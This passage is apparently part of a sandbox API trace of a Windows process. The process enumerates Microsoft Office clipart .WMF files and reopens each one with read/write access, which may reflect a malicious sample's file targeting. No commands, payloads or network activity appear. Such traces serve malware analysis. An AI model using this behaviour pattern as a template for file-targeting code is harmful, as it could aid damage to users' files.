dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.485] GetFileType (hFile=0x27c) returned 0x1 [0102.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.486] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.486] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.486] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.486] CloseHandle (hObject=0x27c) returned 1 [0102.486] AreFileApisANSI () returned 1 [0102.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 69 [0102.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.486] GetFileType (hFile=0x27c) returned 0x1 [0102.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.487] CloseHandle (hObject=0x27c) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.488] AreFileApisANSI () returned 1 [0102.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 69 [0102.488] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f4)) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0102.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.488] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00105_.WMF", cAlternateFileName="")) returned 1 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0102.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0102.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.489] AreFileApisANSI () returned 1 [0102.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0102.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.489] AreFileApisANSI () returned 1 [0102.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 69 [0102.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.490] GetFileType (hFile=0x27c) returned 0x1 [0102.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.490] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.490] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.490] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.490] CloseHandle (hObject=0x27c) returned 1 [0102.491] AreFileApisANSI () returned 1 [0102.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 69 [0102.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.491] GetFileType (hFile=0x27c) returned 0x1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.491] CloseHandle (hObject=0x27c) returned 1 [0102.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.492] AreFileApisANSI () returned 1 [0102.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 69 [0102.492] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x370)) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0102.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.492] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27a2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00122_.WMF", cAlternateFileName="")) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0102.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.493] AreFileApisANSI () returned 1 [0102.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.493] AreFileApisANSI () returned 1 [0102.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 69 [0102.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.493] GetFileType (hFile=0x27c) returned 0x1 [0102.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.493] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.494] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.494] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.494] CloseHandle (hObject=0x27c) returned 1 [0102.494] AreFileApisANSI () returned 1 [0102.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 